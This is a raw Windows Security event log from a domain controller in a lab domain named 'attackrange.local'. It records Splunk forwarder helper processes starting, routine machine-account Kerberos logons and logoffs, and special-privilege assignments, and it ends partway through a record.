04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263889
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779CE3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:34:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263900
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263902
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1494
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263901
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263903
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1894
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263904
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263906
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1880
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263905
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x614
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263907
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779E93
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263908
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b08
New Process Name: C:\Windows\System32\wermgr.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x604
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\wermgr.exe -upload
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263911
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77DD40
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263910
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x77DD40
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51639
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:34:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263909
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77DD40
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:35:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263913
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf44
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263912
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263914
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263915
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263916
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263918
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1080
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263917
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263921
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x782FC6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:35:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263920
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x782FC6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51653
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:35:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263919
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x782FC6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:36:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263923
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1acc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
